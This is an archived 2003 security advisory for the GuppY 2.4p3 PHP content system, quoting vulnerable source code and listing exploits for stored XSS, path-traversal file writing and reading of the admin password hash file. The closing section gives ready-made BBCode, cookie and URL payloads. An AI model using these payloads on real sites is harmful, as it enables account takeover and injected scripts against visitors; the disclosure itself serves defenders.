Informations : °°°°°°°°°°°°° Language : PHP Bugged Version : 2.4p3 (and less ?) Patched version : 2.4p4 Website : http://www.freeguppy.org Problems : - Permanent XSS - Files Reading - Files Writing PHP Code/Location : °°°°°°°°°°°°°°°°°°° postguest.php : -------------------------------------------------------------------------------------------------------------------- [...] $ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/l\\]", "<a href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/L\\]", "<a href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/l\\]", "<a href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/L\\]", "<a href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\1</a>",$ptxt); $ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt); $ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt); $ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt); $ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\" target=_blank>\\2</a>",$ptxt); [...] -------------------------------------------------------------------------------------------------------------------- inc/includes.inc, inc/includes_IIS.inc : ------------------------------------------------------------------------------- [...] $usercookie = "GuppYUser"; $userprefs = array(); if (!empty($HTTP_COOKIE_VARS[$usercookie])) { $userprefs = explode("||",$HTTP_COOKIE_VARS[$usercookie]); $userprefs[0] = strip_tags($userprefs[0]); $userprefs[1] = strip_tags($userprefs[1]); $userprefs[2] = strip_tags($userprefs[2]); $userprefs[3] = strip_tags($userprefs[3]); $userprefs[4] = strip_tags($userprefs[4]); $userprefs[5] = strip_tags($userprefs[5]); $userprefs[6] = strip_tags($userprefs[6],"<br>"); if (($userprefs[0] == $lang[0] || $userprefs[0] == $lang[1]) & empty($lng)) { $lng = $userprefs[0]; } } [...] ------------------------------------------------------------------------------- inc/functions.php : -------------------------------------------------------------- [...] function ReadDBFields($fic) { global $connector; $DataDB = Array(); if (FileDBExist($fic)) { $DataDB = file($fic); for ($i = 0; $i < count($DataDB); $i++) { $Fields[$i] = explode($connector,trim($DataDB[$i])); } } return $Fields; } function WriteDBFields($fic,$Fields) { global $connector; $fhandle = fopen($fic, "w"); $DataDB = ""; for ($i = 0; $i < count($Fields); $i++) { for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) { $DataDB .= trim($Fields[$i][$j]).$connector; } $DataDB .= trim($Fields[$i][count($Fields[$i])-1])."\n"; } fputs($fhandle, $DataDB); fclose($fhandle); } [...] -------------------------------------------------------------- tinymsg.php : ----------------------------------------------------------------------------------------------------------------------------- [...] elseif ($action == 2) { [...] $dbmsg[0][0] = 0; $dbmsg[1][0] = $from; $dbmsg[1][1] = GetCurrentDateTime(); $dbmsg[1][2] = PutBR(RemoveConnector(stripslashes($msg))); WriteDBFields($userep.$to.$dbext,$dbmsg); } [...] elseif ($action == 3) { ?> [...] $dbmsg = Array(); if (FileDBExist($userep.$userprefs[1].$dbext)) { $dbmsg = ReadDBFields($userep.$userprefs[1].$dbext); for ($i = 1; $i < count($dbmsg); $i++) { ?> <p><? echo $web6; ?> <b><? echo $dbmsg[$i][0]; ?></b> <? echo $web7." ".FormatDate($dbmsg[$i][1]); ?></p> <p><? echo $dbmsg[$i][2]; ?></p> <? if ($dbmsg[$i][0] != $web214) { ?> <p align="center">[ <A href ="javascript:PopupWindow('tinymsg.php?lng=<? echo $lng; ?>&action=1&to=<? echo $dbmsg[$i][0]; ?>&from=<? echo $userprefs[1]; ?>','tinywrite',330,245,'no','no')"><? echo $web140; ?></A> ]</p> <? } ?> <hr> [...] ----------------------------------------------------------------------------------------------------------------------------- Exploits : °°°°°°°° - [l]" style="background:url('javascript:[SCRIPT]');visibility:hidden;[/l] - [l][l] style=list-style:url(javascript:[SCRIPT]) truc=[/l][/l] - With a cookie named "GuppYUser" and with the value : fr||[NICK]||[MAIL]||LR||||on||<br style="background:url('javascript:[SCRIPT]')">, if you send a message (forum, guestbook,...) the javascript is executed. - http://[target]/tinymsg.php?action=2&from=Youpi!||Great !||rose||10000&msg=1&to=../poll will add a possibility to the current poll : "Youpi!" with the pink color ("rose" in french) and a score of 10000. - http://[target]//tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2 will write into http://[target]/tadaam.html the line : 0\nyoupi1||[DATE+HEURE]||youpi2 - The cookie named "GuppYUser" and with the value : fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1 sent to the page : http://[target]/tinymsg.php?action=3 will show the source of the file http://[target]/admin/mdp.php (containing the md5-crypted admin password). Patch/More Details : °°°°°°°°°°°°°°°°°° http://www.phpsecure.info frog-m@n _________________________________________________________________ Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail
This archive was generated by hypermail 2b30 : Sun Oct 05 2003 - 11:09:01 PDT